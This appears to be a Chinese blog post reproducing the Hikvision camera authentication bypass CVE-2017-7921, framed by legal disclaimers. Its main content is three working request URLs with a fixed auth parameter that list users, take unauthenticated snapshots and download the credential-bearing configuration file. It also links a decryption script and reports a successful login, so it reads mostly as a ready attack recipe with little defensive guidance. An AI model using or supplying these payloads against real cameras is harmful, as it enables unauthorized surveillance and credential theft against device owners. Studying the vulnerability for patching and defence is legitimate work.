海康威视未授权访问漏洞 (CVE-2017-7921)复现研究

前言:本文内容仅供学习参考及处置建议,文章内容不涉及任何以破坏为目的的犯罪行为,敏感信息已经过脱敏处理,请勿将本文内容用于违法犯罪活动!

一、发现摄像头

(略)

二、构造payload测试

以下是可能存在漏洞的登录页面样式,经供参考。

复制代码
1.http://[摄像头IP]/Security/users?auth=YWRtaW46MTEK 获取用户 
2.http://[摄像头IP]/onvif-http/snapshot?auth=YWRtaW46MTEK 拍摄快照而不进行身份验证 
3.http://[摄像头IP]/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件(该文件包含用户名密码等关键信息)

构造第一条语句,看到用户admin:

构造第二条语句,拍摄快照:

构造第三条语句,下载配置文件;

三、解密配置文件获取用户名密码

拿到用户名密码,登录成功。

解密脚本地址:

https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

声明:本文档仅供安全研究与学习交流使用,切勿用于非法渗透测试或未授权攻击。

相关推荐
未来之窗软件服务14 小时前
自考大学★信息安全●简答题—东方仙盟
安全·web安全·仙盟创梦ide·东方仙盟
UCloud_TShare15 小时前
从DeepSeek Elastic Compute到UCloud Agent Sandbox:构建安全、可控的Agent执行环境
安全
xbzb15 小时前
Linux SELinux 安全加固与标签排错手册
linux·运维·安全
其实防守也摸鱼15 小时前
SQL注入实验笔记
android·运维·数据库·安全·oracle·自动化
jimmyleeee16 小时前
大模型安全之三十五:间接Prompt 注入测试全景指南
安全·prompt
小静AI工程实验室16 小时前
MD5 算法详解:哈希原理、标准向量、输入编码与安全边界
算法·安全·哈希算法·md5
用户43205793112917 小时前
Jev 初筛实测:准确率没变,漏报多了 25 条
安全
lupai17 小时前
SSL 证书落地应用与网站安全加固指南
网络协议·安全·ssl
傲世仙尊17 小时前
线程池收尾-回调单例与可重入线程安全
linux·安全
Multipath71219 小时前
Ku保底,Ka提速— 双频卫星聚合,打造应急通信“不断线”保底链路
网络·5g·安全·智能路由器·实时音视频